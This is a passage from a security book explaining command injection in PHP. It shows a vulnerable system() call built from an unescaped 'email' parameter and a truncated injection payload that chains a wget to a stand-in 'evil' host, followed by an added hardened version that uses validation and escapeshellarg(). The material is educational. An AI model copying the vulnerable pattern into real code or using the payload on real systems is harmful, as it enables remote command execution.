Consider the following PHP code snippet:
<?php
$email_subject = "some subject";
if (isset($_GET['email'])) {
    // The email parameter is concatenated into the command line unescaped
    system("mail " . $_GET['email'] . " -s '" . $email_subject .
           "' < /tmp/email_body", $return_val);
}
?>
The user sends his or her e-mail address in the email parameter, and that user input
is placed directly into a system command. As with SQL injection, the attacker's goal
is to inject a shell command into the email parameter while ensuring that the code before
and after the email parameter remains syntactically correct. Consider the system() call
as a puzzle. The outer puzzle pieces are in place, and the attacker must find a puzzle
piece in the middle to finish it off:
mail [MISSING PUZZLE PIECE] -s 'some subject' < /tmp/email_body
Chapter 1: Common Injection Attacks 11
The puzzle piece needs to ensure that the mail command runs and exits properly. For
example, mail --help will run and exit properly. Then the attacker could add additional
shell commands by separating the commands with semicolons (;). Dealing with the puzzle
piece on the other side is as simple as commenting it out with the shell comment symbol (#).
Thus, a useful puzzle piece for the email parameter might be this:
--help; wget http://evil.
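As an added example (not from the book), here is the same functionality rewritten so that the puzzle piece no longer fits: the address is checked against an allow-list before use, and every value that reaches the shell is quoted with escapeshellarg(). The function names and the regular expression are my own choices, not the book's.

```php
<?php
// Added example, not from the original text. Assumes the same inputs as the
// snippet above: the "email" GET parameter and a body file at /tmp/email_body.

// Returns the address if it is a plain e-mail address, otherwise null.
function validate_recipient(?string $input): ?string
{
    if ($input === null) {
        return null;
    }
    $addr = filter_var($input, FILTER_VALIDATE_EMAIL);
    // filter_var() accepts some exotic but RFC-valid forms (quoted local parts,
    // for instance) that contain shell metacharacters. A second allow-list keeps
    // only unremarkable addresses and rejects a leading '-', so the value can
    // never be read by mail as an option such as --help.
    $allow = '/^[A-Za-z0-9][A-Za-z0-9._%+-]*@[A-Za-z0-9.-]+$/';
    if ($addr === false || !preg_match($allow, $addr)) {
        return null;
    }
    return $addr;
}

// Builds the command line with each value quoted as a single shell argument.
function build_mail_command(string $recipient, string $subject, string $body_path): string
{
    // escapeshellarg() wraps the value in single quotes and escapes any embedded
    // quotes, so ';', '#', '|' and similar characters stay inside one argument.
    return 'mail ' . escapeshellarg($recipient)
         . ' -s ' . escapeshellarg($subject)
         . ' < ' . escapeshellarg($body_path);
}

$email_subject = "some subject";
$recipient = validate_recipient($_GET['email'] ?? null);
if ($recipient === null) {
    http_response_code(400);
    exit("invalid e-mail address");
}
system(build_mail_command($recipient, $email_subject, '/tmp/email_body'), $return_val);
```

With the validation in place the earlier payload is rejected outright; even if it were not, escapeshellarg() would hand it to mail as one literal recipient string rather than as a second command.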